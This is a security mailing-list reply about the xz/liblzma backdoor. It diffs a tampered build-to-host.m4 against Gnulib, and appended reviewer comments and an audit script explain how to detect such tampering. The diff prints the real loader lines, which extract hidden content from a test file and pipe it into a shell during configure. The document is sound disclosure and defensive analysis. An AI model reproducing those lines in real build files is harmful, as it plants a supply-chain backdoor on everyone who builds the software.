oss-sec mailing list archives
Re: backdoor in upstream xz/liblzma leading to ssh server compromise
From: Collin Funk <collin.funk1 () gmail com>
Date: Fri, 29 Mar 2024 23:21:19 -0700
I am not subscribed to this list, sorry for the missing Reply-To. It looks like they copied the build-to-host.m4 file from Gnulib and made malicious modifications, hoping no one would notice [1]. Hopefully this diff will help lead anyone investigating it in the correct direction: $ diff -u m4/build-to-host.m4 $GNULIB_REFDIR/m4/build-to-host.m4 --- m4/build-to-host.m4 2024-03-29 21:52:50.956049825 -0700 +++ /home/collin/.local/src/gnulib/m4/build-to-host.m4 2024-03-29 22:37:06.424791077 -0700 @@ -1,4 +1,4 @@ -# build-to-host.m4 serial 30 +# build-to-host.m4 serial 3 dnl Copyright (C) 2023-2024 Free Software Foundation, Inc. dnl This file is free software; the Free Software Foundation dnl gives unlimited permission to copy and/or distribute it, @@ -37,7 +37,6 @@ dnl Define somedir_c. gl_final_[$1]="$[$1]" - gl_[$1]_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"` dnl Translate it from build syntax to host syntax. case "$build_os" in cygwin*) 
@@ -59,40 +58,14 @@ if test "$[$1]_c_make" = '\"'"${gl_final_[$1]}"'\"'; then [$1]_c_make='\"$([$1])\"' fi - if test "x$gl_am_configmake" != "x"; then - gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null' - else - gl_[$1]_config='' - fi - _LT_TAGDECL([], [gl_path_map], [2])dnl - _LT_TAGDECL([], [gl_[$1]_prefix], [2])dnl - _LT_TAGDECL([], [gl_am_configmake], [2])dnl - _LT_TAGDECL([], [[$1]_c_make], [2])dnl - _LT_TAGDECL([], [gl_[$1]_config], [2])dnl AC_SUBST([$1_c_make]) - - dnl If the host conversion code has been placed in $gl_config_gt, - dnl instead of duplicating it all over again into config.status, - dnl then we will have config.status run $gl_config_gt later, so it - dnl needs to know what name is stored there: - AC_CONFIG_COMMANDS([build-to-host], [eval $gl_config_gt | $SHELL 2>/dev/null], [gl_config_gt="eval \$gl_[$1]_config"]) ]) dnl Some initializations for gl_BUILD_TO_HOST. AC_DEFUN([gl_BUILD_TO_HOST_INIT], [ - dnl Search for Automake-defined pkg* macros, in the order - dnl listed in the Automake 1.10a+ documentation. - gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null` - if test -n "$gl_am_configmake"; then - HAVE_PKG_CONFIGMAKE=1 - else - HAVE_PKG_CONFIGMAKE=0 - fi - gl_sed_double_backslashes='s/\\/\\\\/g' gl_sed_escape_doublequotes='s/"/\\"/g' - gl_path_map='tr "\t \-_" " \t_\-"' changequote(,)dnl gl_sed_escape_for_make_1="s,\\([ \"&'();<>\\\\\`|]\\),\\\\\\1,g" changequote([,])dnl It is pretty clear that this line: gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null` is checking for and saving 'tests/files/bad-3-corrupt_lzma2.xz'. I don't think HAVE_PKG_CONFIGMAKE is used anywhere but I could be missing something. The '[$1]' in variable names seems to expand to 'locale'. 
See these lines from ./configure:

    gl_[$1]_prefix
    gl_[$1]_config
    gl_config_gt="eval \$gl_localedir_config"
    gl_localedir_config='`$ECHO "$gl_localedir_config" | $SED "$delay_single_quote_subst"`'
    gl_localedir_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"

Hopefully that can help someone who is more versed in Autoconf and m4.

Thanks for the work testing and discovering this.

[1] https://git.savannah.gnu.org/cgit/gnulib.git/tree/m4/build-to-host.m4

Collin
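
Review bot: the serial line in the first hunk (@@ -1,4 +1,4 @@) is a mismatch that deserves a check of its own. The copy on the '-' side declares "serial 30" while the Gnulib reference on the '+' side declares "serial 3", and nothing else in that header differs. A shipped macro whose serial is ahead of the reference it was copied from should be treated as locally modified and compared in full against the reference, which is what the remaining hunks do.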
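
Review bot: in the second hunk (@@ -37,7 +37,6 @@) the '-' line that assigns gl_[$1]_prefix has no counterpart in the reference, carries no comment, and its name does not match what it computes. The sed expression "s/.*\.//g" deletes everything up to the last dot of $gl_am_configmake, so the variable called prefix holds a file-name extension. The third hunk then expands it in command position ("| $gl_[$1]_prefix -d"), which means a string taken from a file name decides which program runs. A value derived from a path should not be expanded as a command name; a macro that needs a tool should name it explicitly or take it from a checked AC_PATH_PROG result.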
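
Review bot: the AC_CONFIG_COMMANDS line in the third hunk (@@ -59,40 +58,14 @@) pipes the output of an eval into $SHELL with stderr sent to /dev/null, and the dnl comment above it about "host conversion code" does not describe that. Following the variables on the '-' side: gl_am_configmake is whichever file under $srcdir matches the grep -aErls pattern, gl_[$1]_config passes that file through sed, the tr mapping in gl_path_map and "$gl_[$1]_prefix -d", and gl_config_gt evaluates that pipeline, so content read from the source tree is handed to a shell when config.status runs. The comment "Search for Automake-defined pkg* macros" likewise sits above a recursive grep for a byte pattern, not a macro lookup. None of these lines exist on the reference side. In review, an m4 macro that feeds generated text to eval or $SHELL, or silences stderr while doing so, should be rejected unless both its comments and the upstream copy account for it.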
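
The comparison made by hand in the message above, generalised to every macro a release tree shares with a reference Gnulib checkout. This is an added example, not part of the original message or of any project's tooling; the function names, finding labels and the two sample trees are assumptions constructed for illustration.

```sh
#!/bin/sh
# Added example: audit shipped m4 macros against a reference Gnulib checkout.
# Function names and finding labels are assumptions, not an existing tool.

# Print the number after "serial" in an m4 file's header comment, if any.
m4_serial() {
    sed -n 's/^#.* serial \([0-9][0-9]*\).*/\1/p' "$1" | head -n 1
}

# audit_m4 SHIPPED_DIR REFERENCE_DIR -> one finding per line:
#   SERIAL  shipped serial is ahead of the reference copy
#   DIFFERS content is not byte-identical to the reference copy
#   EXEC    a shipped-only line uses eval or pipes into $SHELL
audit_m4() {
    shipped=$1
    ref=$2
    for f in "$shipped"/*.m4; do
        name=${f##*/}
        [ -f "$f" ] && [ -f "$ref/$name" ] || continue
        s=$(m4_serial "$f")
        r=$(m4_serial "$ref/$name")
        if [ -n "$s" ] && [ -n "$r" ] && [ "$s" -gt "$r" ]; then
            echo "SERIAL $name shipped=$s reference=$r"
        fi
        if ! cmp -s "$f" "$ref/$name"; then
            echo "DIFFERS $name"
            # In plain diff output, '>' marks lines found only in the shipped file.
            if diff "$ref/$name" "$f" | grep '^>' | grep -Eq 'eval |\| *\$SHELL'; then
                echo "EXEC $name"
            fi
        fi
    done
}

# Constructed sample trees, built from lines quoted in the diff above.
demo() {
    tmp=$(mktemp -d)
    mkdir "$tmp/shipped" "$tmp/ref"
    printf '# other.m4 serial 1\n' | tee "$tmp/ref/other.m4" > "$tmp/shipped/other.m4"
    printf '# build-to-host.m4 serial 3\nAC_SUBST([$1_c_make])\n' \
        > "$tmp/ref/build-to-host.m4"
    printf '%s\n' '# build-to-host.m4 serial 30' 'AC_SUBST([$1_c_make])' \
        'AC_CONFIG_COMMANDS([build-to-host], [eval $gl_config_gt | $SHELL 2>/dev/null])' \
        > "$tmp/shipped/build-to-host.m4"
    audit_m4 "$tmp/shipped" "$tmp/ref"
    rm -rf "$tmp"
}

demo
```

Files that exist only in the shipped tree are skipped here; a fuller audit would list them separately, since a macro with no reference copy cannot be compared at all.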